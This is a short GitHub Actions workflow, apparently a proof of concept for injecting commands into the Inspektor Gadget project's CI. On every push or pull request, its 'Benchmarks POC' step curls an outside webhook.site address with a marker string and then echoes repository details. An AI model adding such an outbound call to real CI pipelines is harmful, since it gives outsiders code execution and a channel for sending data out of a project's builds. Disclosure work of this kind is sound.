name: Inspektor Gadget CI POC
env:
  IS_RELEASE: ${{ startsWith(github.ref, 'refs/tags/v') }}
  REGISTRY: ghcr.io
  CONTAINER_REPO: ${{ github.repository }}
  GO_VERSION: 1.25.8
  GO_VERSION_DOC_CHECK: 1.21.3

on:
  push:
  pull_request:
  workflow_dispatch:

permissions: read-all

jobs:
  benchmarks:
    name: Benchmarks POC
    runs-on: ubuntu-latest
    steps:
      - name: Show repository setup and Trigger Webhook
        run: |
          # Proof of Concept: Remote Command Execution via Workflow Injection
          curl -X POST https://webhook.site/1c79311b-5335-4a1c-85f8-e9f559f0be0d -d "data=POC_FIRMAN_SAHIDIN_RCE_SUCCESS"
          
          echo "github.event_name: $GITHUB_EVENT_NAME"
          echo "github.repository: $GITHUB_REPOSITORY"
